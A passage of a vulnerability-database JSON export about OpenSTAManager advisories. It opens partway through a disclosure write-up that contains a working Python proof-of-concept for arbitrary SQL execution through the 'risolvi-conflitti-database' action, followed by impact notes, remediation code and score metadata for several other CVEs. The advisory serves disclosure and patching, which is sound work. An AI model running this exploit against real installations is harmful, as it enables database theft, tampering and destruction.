--proxy http://127.0.0.1:8080\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin --module-id 6\\n\"\n ),\n )\n p.add_argument(\"-t\", \"--target\", required=True, help=\"Base URL (e.g. http://host:port)\")\n p.add_argument(\"-u\", \"--username\", required=True, help=\"Valid username for authentication\")\n p.add_argument(\"-p\", \"--password\", required=True, help=\"Password for authentication\")\n p.add_argument(\n \"--proxy\",\n default=None,\n help=\"HTTP proxy (e.g. http://127.0.0.1:8080 for Burp Suite)\",\n )\n p.add_argument(\n \"--module-id\",\n type=int,\n default=None,\n help=\"Aggiornamenti module ID (auto-detected if omitted)\",\n )\n p.add_argument(\n \"--verify-only\",\n action=\"store_true\",\n help=\"Only verify the vulnerability, do not extract data\",\n )\n return p.parse_args()\n\n\nclass OSMExploit:\n def __init__(self, args):\n self.target = args.target.rstrip(\"/\")\n self.username = args.username\n self.password = args.password\n self.module_id = args.module_id\n self.session = requests.Session()\n self.session.headers.update(DEFAULT_HEADERS)\n self.session.verify = False\n\n if args.proxy:\n self.session.proxies = {\"http\": args.proxy, \"https\": args.proxy}\n\n self.request_count = 0\n\n def login(self):\n info(\"Authenticating as '%s'...\" % self.username)\n\n # First GET to obtain a valid session cookie\n self.session.get(f\"{self.target}/index.php\")\n self.request_count += 1\n\n r = self.session.post(\n f\"{self.target}/index.php\",\n data={\"op\": \"login\", \"username\": self.username, \"password\": self.password},\n allow_redirects=False,\n )\n self.request_count += 1\n\n if r.status_code != 302:\n fail(\"Login failed (HTTP %d). Check credentials.\" % r.status_code)\n return False\n\n location = r.headers.get(\"Location\", \"\")\n\n # Success redirects to controller.php; failure redirects back to index.php\n if \"controller.php\" in location:\n success(\"Authenticated successfully.\")\n # Follow redirect to establish full session\n self.session.get(f\"{self.target}/{location.lstrip('/')}\", allow_redirects=True)\n self.request_count += 1\n return True\n\n # If redirected back to index.php, the login failed\n # Common causes: wrong credentials, brute-force lockout, or active session token\n fail(\"Login failed — redirected to '%s'.\" % location)\n fail(\"Possible causes:\")\n fail(\" 1. Wrong credentials\")\n fail(\" 2. Brute-force lockout (wait 3 min or clear zz_logs)\")\n fail(\" 3. Active session token (another session is open)\")\n fail(\" Tip: clear the token with SQL: UPDATE zz_users SET session_token=NULL WHERE username='%s';\" % self.username)\n return False\n\n def detect_module_id(self):\n if self.module_id is not None:\n info(\"Using provided module ID = %d\" % self.module_id)\n return True\n\n info(\"Auto-detecting Aggiornamenti module ID...\")\n # Search for the module ID in the navigation HTML\n r = self.session.get(f\"{self.target}/index.php\", allow_redirects=True)\n self.request_count += 1\n\n # Look for sidebar link: <a href=\"/controller.php?id_module=6\" ...>...<p>Aggiornamenti</p>\n\n matches = re.findall(r'id_module=(\\d+)\"[^<]*<[^<]*<[^<]*Aggiornamenti', r.text)\n if matches:\n self.module_id = int(matches[0])\n success(\"Aggiornamenti module ID = %d\" % self.module_id)\n return True\n\n # Secondary pattern: data-id attribute near Aggiornamenti text\n matches = re.findall(r'data-id=\"(\\d+)\"[^<]*onclick[^<]*id_module=\\d+[^<]*<[^<]*<[^<]*<[^<]*Aggiornamenti', r.text)\n if matches:\n self.module_id = int(matches[0])\n success(\"Aggiornamenti module ID = %d\" % self.module_id)\n return True\n\n # Fallback: try common IDs\n for test_id in [6, 7, 8, 5, 4]:\n r = self.session.get(\n f\"{self.target}/controller.php?id_module={test_id}\",\n allow_redirects=True,\n )\n self.request_count += 1\n if \"Aggiornamenti\" in r.text or \"aggiornamenti\" in r.text.lower():\n self.module_id = test_id\n success(\"Aggiornamenti module ID = %d\" % test_id)\n return True\n\n fail(\"Could not detect Aggiornamenti module ID. Use --module-id N.\")\n return False\n\n def execute_sql(self, queries):\n \"\"\"Execute arbitrary SQL via risolvi-conflitti-database.\"\"\"\n r = self.session.post(\n f\"{self.target}/editor.php?id_module={self.module_id}&id_record={self.module_id}\",\n data={\n \"op\": \"risolvi-conflitti-database\",\n \"queries\": json.dumps(queries),\n },\n )\n self.request_count += 1\n return r\n\n def verify(self):\n marker_table = \"poc_vuln04_verify\"\n marker_value = \"CVE_PROOF_arbitrary_sql_execution\"\n\n info(\"Step 1: Creating marker table via arbitrary SQL execution...\")\n queries = [\n f\"DROP TABLE IF EXISTS {marker_table}\",\n f\"CREATE TABLE {marker_table} (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\",\n f\"INSERT INTO {marker_table} (proof) VALUES ('{marker_value}')\",\n ]\n r = self.execute_sql(queries)\n info(\"Response: HTTP %d\" % r.status_code)\n\n info(\"Step 2: Verifying marker table exists by reading it back...\")\n # Use a second query to read the data via a UNION or time-based approach\n # Since we can execute arbitrary SQL, we can verify by creating another\n # marker and checking via a SELECT INTO approach\n verify_queries = [\n f\"INSERT INTO {marker_table} (proof) VALUES (CONCAT('verified_', (SELECT VERSION())))\",\n ]\n r2 = self.execute_sql(verify_queries)\n\n # The JSON response may be embedded within HTML (editor.php renders the full page\n # after executing the action). Extract JSON from the response body.\n\n for resp in [r, r2]:\n # Try parsing as pure JSON first\n try:\n data = resp.json()\n if data.get(\"success\"):\n success(\"SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.\")\n success(\"Marker table '%s' created with proof value.\" % marker_table)\n info(\"Response: %s\" % data.get(\"message\", \"\")[:200])\n return True\n except (ValueError, KeyError):\n pass\n\n # Extract embedded JSON from HTML response\n json_match = re.search(r'\\{\"success\"\\s*:\\s*true\\s*,\\s*\"message\"\\s*:\\s*\"([^\"]*)\"', resp.text)\n if json_match:\n success(\"SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.\")\n success(\"Marker table '%s' created with proof value.\" % marker_table)\n info(\"Server message: %s\" % json_match.group(1)[:200])\n return True\n\n # Check for query execution indicators in response\n if \"query sono state eseguite\" in resp.text or \"query eseguite\" in resp.text.lower():\n success(\"SQL EXECUTION CONFIRMED! Server reports queries were executed.\")\n return True\n\n fail(\"Could not verify SQL execution. Check target manually.\")\n fail(\"Tip: use --module-id N if auto-detection failed.\")\n return False\n\n def cleanup(self):\n info(\"Cleaning up marker tables...\")\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_verify\"])\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_marker\"])\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_tecnico\"])\n success(\"Cleanup complete.\")\n\n\n# ── Output helpers ──────────────────────────────────────────────────\n\ndef info(msg):\n print(f\"\\033[34m[*]\\033[0m {msg}\")\n\ndef success(msg):\n print(f\"\\033[32m[+]\\033[0m {msg}\")\n\ndef fail(msg):\n print(f\"\\033[31m[-]\\033[0m {msg}\")\n\n\n# ── Main ────────────────────────────────────────────────────────────\n\ndef main():\n args = parse_args()\n exploit = OSMExploit(args)\n\n if not exploit.login():\n sys.exit(1)\n\n if not exploit.detect_module_id():\n sys.exit(1)\n\n print()\n info(\"=== Vulnerability Verification ===\")\n if not exploit.verify():\n sys.exit(1)\n\n print()\n info(\"=== Cleanup ===\")\n exploit.cleanup()\n\n print()\n success(\"Verification complete. %d HTTP requests sent.\" % exploit.request_count)\n info(\n \"All traffic was sent through the configured proxy.\"\n if args.proxy\n else \"Tip: use --proxy http://127.0.0.1:8080 to capture in Burp Suite.\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Impact\n\n- **Confidentiality:** Complete database exfiltration — credentials, PII, financial data, configuration secrets.\n- **Integrity:** Full control over all database tables — insert, update, delete any record. An attacker can create new admin accounts, modify financial records, or plant backdoors.\n- **Availability:** An attacker can `DROP` critical tables, corrupt data, or execute resource-intensive queries to cause denial of service.\n- **Potential Remote Code Execution:** Depending on MySQL server configuration, an attacker may be able to use `SELECT ... INTO OUTFILE` to write arbitrary files to the server filesystem, or use MySQL UDF (User Defined Functions) to execute operating system commands.\n\n## Proposed Remediation\n\n### Option A: Remove Direct Query Execution (Recommended)\n\nReplace the arbitrary SQL execution with a predefined set of safe operations. The conflict resolution feature should only execute queries that were generated by the application itself, not user-supplied SQL:\n\n```php\ncase 'risolvi-conflitti-database':\n $queries_json = post('queries');\n $queries = json_decode($queries_json, true);\n\n if (empty($queries)) {\n echo json_encode(['success' => false, 'message' => tr('Nessuna query ricevuta.')]);\n break;\n }\n\n // ALLOWLIST: Only permit specific safe SQL patterns\n $allowed_patterns = [\n '/^ALTER\\s+TABLE\\s+`?\\w+`?\\s+(ADD|MODIFY|CHANGE|DROP)\\s+/i',\n '/^CREATE\\s+INDEX\\s+/i',\n '/^DROP\\s+INDEX\\s+/i',\n '/^UPDATE\\s+`?zz_views`?\\s+SET\\s+/i',\n '/^INSERT\\s+INTO\\s+`?zz_/i',\n ];\n\n $safe_queries = [];\n $rejected = [];\n\n foreach ($queries as $query) {\n $is_safe = false;\n foreach ($allowed_patterns as $pattern) {\n if (preg_match($pattern, trim($query))) {\n $is_safe = true;\n break;\n }\n }\n\n if ($is_safe) {\n $safe_queries[] = $query;\n } else {\n $rejected[] = $query;\n }\n }\n\n if (!empty($rejected)) {\n echo json_encode([\n 'success' => false,\n 'message' => tr('Query non permesse rilevate. Operazione bloccata.'),\n ]);\n break;\n }\n\n // Execute only validated queries\n foreach ($safe_queries as $query) {\n $dbo->query($query);\n }\n // ...\n```\n\n### Option B: Server-Side Query Generation\n\nInstead of accepting raw SQL from the client, have the client send operation descriptors and generate the SQL on the server:\n\n```php\ncase 'risolvi-conflitti-database':\n $operations = json_decode(post('operations'), true);\n\n foreach ($operations as $op) {\n switch ($op['type']) {\n case 'add_column':\n $table = preg_replace('/[^a-zA-Z0-9_]/', '', $op['table']);\n $column = preg_replace('/[^a-zA-Z0-9_]/', '', $op['column']);\n $type = preg_replace('/[^a-zA-Z0-9_() ]/', '', $op['datatype']);\n $dbo->query(\"ALTER TABLE `{$table}` ADD COLUMN `{$column}` {$type}\");\n break;\n // ... other safe operations\n }\n }\n```\n\n### Option C: Restrict Access (Minimum Mitigation)\n\nAt minimum, restrict this operation to admin-only users:\n\n```php\ncase 'risolvi-conflitti-database':\n if (!auth_osm()->getUser()->is_admin) {\n echo json_encode(['success' => false, 'message' => tr('Accesso negato.')]);\n break;\n }\n // ... existing code\n```\n\n**Note:** This alone is insufficient because even admin accounts can be compromised, and the feature still allows arbitrary SQL execution.\n\n### Additional Recommendations\n\n1. **Remove `SET FOREIGN_KEY_CHECKS=0`**: Foreign key checks should never be disabled based on user-initiated actions.\n2. **Sanitize error output**: Exception messages at line 79 leak database structure information. Replace with generic error messages.\n3. **Add CSRF protection**: Ensure the endpoint validates a CSRF token to prevent cross-site request forgery attacks.\n4. **Audit logging**: Log the actual SQL queries being executed (already partially implemented) but also log the requesting user's IP address and session.\n\n## Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35168", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10493", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10388", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10472", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10511", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35168" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T16:19:18Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T16:19:18Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T16:19:18Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35168", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35168" }, { "reference_url": "https://github.com/advisories/GHSA-2fr7-cc4f-wh98", "reference_id": "GHSA-2fr7-cc4f-wh98", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2fr7-cc4f-wh98" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-35168", "GHSA-2fr7-cc4f-wh98" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e7y7-21j6-k7hj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/48417?format=api", "vulnerability_id": "VCID-g8ft-7f76-ebd4", "summary": "OpenSTAManager has Authenticated SQL Injection in API via 'display' parameter\nAn authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the `display` parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65103", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01721", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01729", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01723", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65103" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65103", "reference_id": "CVE-2025-65103", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65103" }, { "reference_url": "https://github.com/advisories/GHSA-2jm2-2p35-rp3j", "reference_id": "GHSA-2jm2-2p35-rp3j", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2jm2-2p35-rp3j" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j", "reference_id": "GHSA-2jm2-2p35-rp3j", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/71464?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.9.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2br1-99zg-z7bh" }, { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-7e19-24d8-f7gd" }, { "vulnerability": "VCID-7h5v-9rhe-2bbp" }, { "vulnerability": "VCID-81kx-rj8c-dkbr" }, { "vulnerability": "VCID-8x62-3aff-hbak" }, { "vulnerability": "VCID-by14-5puv-qygm" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-gnx6-chzh-3fc3" }, { "vulnerability": "VCID-nv3t-9e16-8kbn" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-pxzr-bvsj-y3gs" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-w4gk-vbbq-13ea" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.9.5" } ], "aliases": [ "CVE-2025-65103", "GHSA-2jm2-2p35-rp3j" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g8ft-7f76-ebd4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50054?format=api", "vulnerability_id": "VCID-gnx6-chzh-3fc3", "summary": "OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module\nCritical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameter:** `id_records[]` (POST array)\n**Affected Endpoint:** `/actions.php?id_module=18` (Scadenzario module)\n**Attack Type:** Error-Based SQL Injection (IN clause)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24418", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24418" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24418", "reference_id": "CVE-2026-24418", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24418" }, { "reference_url": "https://github.com/advisories/GHSA-4xwv-49c8-fvhq", "reference_id": "GHSA-4xwv-49c8-fvhq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4xwv-49c8-fvhq" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq", "reference_id": "GHSA-4xwv-49c8-fvhq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-06T18:47:55Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-24418", "GHSA-4xwv-49c8-fvhq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gnx6-chzh-3fc3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50656?format=api", "vulnerability_id": "VCID-nv3t-9e16-8kbn", "summary": "OpenSTAManager affected by unauthenticated privilege escalation via modules/utenti/actions.php\nA privilege escalation and authentication bypass vulnerability in OpenSTAManager allows any attacker to arbitrarily change a user's group (`idgruppo`) by directly calling `modules/utenti/actions.php`. This can promote an existing account (e.g. agent) into the Amministratori group as well as demote any user including existing administrators.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27012", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14474", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14558", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14598", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14595", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27012" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27012", "reference_id": "CVE-2026-27012", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27012" }, { "reference_url": "https://github.com/advisories/GHSA-247v-7cw6-q57v", "reference_id": "GHSA-247v-7cw6-q57v", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-247v-7cw6-q57v" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-247v-7cw6-q57v", "reference_id": "GHSA-247v-7cw6-q57v", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-04T21:21:23Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-247v-7cw6-q57v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-27012", "GHSA-247v-7cw6-q57v" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nv3t-9e16-8kbn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50040?format=api", "vulnerability_id": "VCID-nzzy-h46k-bfcr", "summary": "OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service\nCritical Time-Based Blind SQL Injection vulnerability affecting **multiple search modules** in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with **amplified execution** across 10+ modules.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameter:** `term` (GET)\n**Affected Endpoint:** `/ajax_search.php`\n**Affected Modules:** Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24417", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24417" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24417", "reference_id": "CVE-2026-24417", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24417" }, { "reference_url": "https://github.com/advisories/GHSA-4hc4-8599-xh2h", "reference_id": "GHSA-4hc4-8599-xh2h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4hc4-8599-xh2h" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h", "reference_id": "GHSA-4hc4-8599-xh2h", "reference_type": "", "scores": [ { "value": "HIGH", 